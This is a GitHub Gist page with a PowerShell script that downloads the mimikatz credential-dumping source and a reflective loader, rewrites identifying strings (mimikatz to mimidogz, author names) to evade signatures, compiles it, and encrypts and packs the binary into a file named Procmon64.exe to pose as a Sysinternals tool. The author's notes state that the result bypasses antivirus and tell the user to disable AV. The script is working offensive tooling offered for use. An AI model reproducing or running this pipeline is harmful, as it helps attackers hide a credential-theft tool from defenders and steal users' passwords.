Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Download compile and encrypt the latest mimikatz
#requires -version 2
<#
Author: Noah
@subTee's reflexive loader
Required Dependencies: msbuild, csc
Execute: Run-UpdateKatz -Verbose
This will download the latest mimikatz source and @subTee's reflexive PE loader, unzip, compile,
encrypt, and package the mimikatz binary into Procmon64.exe. The file itself will bypass AV.
Running is a different story.
Obviously run this from a clean machine, disable AV so you don't lose mimikatz
https://stackoverflow.com/questions/25506178/getting-msbuild-exe-without-installing-visual-studio
#>
$msbuild_path = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\amd64\MSBuild.exe"
$cscBuildPath = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csc.exe"
$utilName = "Procmon64.exe"
function Get-MimiAndKatz {
[CmdletBinding()] Param()
Write-Verbose "Downloading mimi katz and katz2.0..."
$Domain = ""
$User = ""
$Password = ""
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
#$proxy = [Net.WebRequest]::GetSystemWebProxy()
#$credCache = [Net.CredentialCache]::new()
#$netCreds = [Net.NetworkCredential]::new("$User","$Password","$Domain")
#$credCache.Add([Net.WebProxy]::GetDefaultProxy().Address, "Basic", $netCreds)
#$proxy.Credentials = $credCache
$webClient = New-Object System.NET.WebClient
#$webClient.Proxy = $proxy
$webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3578.108 Safari/537.36")
$mimiURL = "https://github.com/gentilkiwi/mimikatz/archive/master.zip"
$destMimi = (Get-Location).Path + "\mimikatz-master.zip"
$webClient.DownloadFile($mimiURL, $destMimi)
$katzURL = "https://raw.githubusercontent.com/thesubtlety/Utils/master/katz2.0.cs"
$destKatz = (Get-Location).Path + "\katz2.0.cs"
$webClient.DownloadFile($katzURL, $destKatz)
Write-Verbose "Saving to `n`t$destKatz `n`t$destMimi"
Unzip $destMimi ($destMimi -replace ".zip")
}
# Required for posh <v5
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip {
param([string]$zipfile, [string]$outpath)
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
function PrepareBuild-Mimi{
[CmdletBinding()] Param()
Write-Verbose "Renaming things..."
$mimipath = (get-location).path + "\mimikatz-master\mimikatz-master"
$allfiles = Get-ChildItem $mimipath -recurse | Where-Object { $_.Attributes -notmatch 'directory' } | `
Where-Object { $_.Extension -match '\.c|\.cs|\.cmd|\.def|\.filters|\.h|\.idl|\.rc|\.sln|\.tlog|\.vcxproj|\.yar' }
foreach ($file in $allfiles) {
(Get-Content $file.PSPath) | `
ForEach-Object { $_ -replace "mimikatz", "mimidogz" `
-replace "kiwi", "fruity" `
-replace "delpy", "french" `
-replace "gentilkiwi", "gentle" `
-replace "Build with love", "" `
-replace "vincent", "vinny" `
} | `
Set-Content $file.PSPath
}
#Get-ChildItem -recurse $mimipath | Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }
Get-ChildItem -recurse $mimipath | Where-Object { $_.name -match "mimikatz" } | Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }
Write-Verbose "Building mimikatz..."
iex "cmd /c `"$msbuild_path`" `"$mimipath\mimidogz.sln`" /t:Build /p:Configuration=Release /p:Platform=x64 "
}
function Build-Katz($katzPath) {
Write-Verbose "Building Katz2.0..."
IEX "cmd /c `"$cscBuildPath`" /t:exe /out:$utilName /unsafe $katzPath"
#$c = '"$cscBuildPath" "/t:exe /out:$utilName /unsafe $katzPath"'
#iex "& $c"
}
function PrepareBuild-Katz {
Write-Verbose "Fixing up defaults..."
$katzPath = (Get-Location).Path + "\katz2.0.cs"
(Get-Content $katzPath) -replace "`"password`"", "`"WaitForSingleObject`"" | Set-Content $katzPath
Build-Katz($katzPath)
}
function Encrypt-Mimi {
[CmdletBinding()] Param()
Write-Verbose "Encrypting mimikatz with katz2..."
$katzPath = (Get-Location).Path + "\katz2.0.cs"
$mimiexePath = (Get-Location).path + "\mimikatz-master\mimikatz-master\x64\mimidogz.exe"
$out = IEX "cmd /c .\$utilName encrypt $mimiexePath"
(Get-Content $katzPath) -replace "INSERT B64 HERE", $out | Set-Content $katzPath
Build-Katz($katzPath)
Write-Verbose "Done... Run $utilname..."
}
function Run-UpdateKatz {
[CmdletBinding()] Param()
Get-MimiAndKatz
PrepareBuild-Mimi
PrepareBuild-Katz
Encrypt-Mimi
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment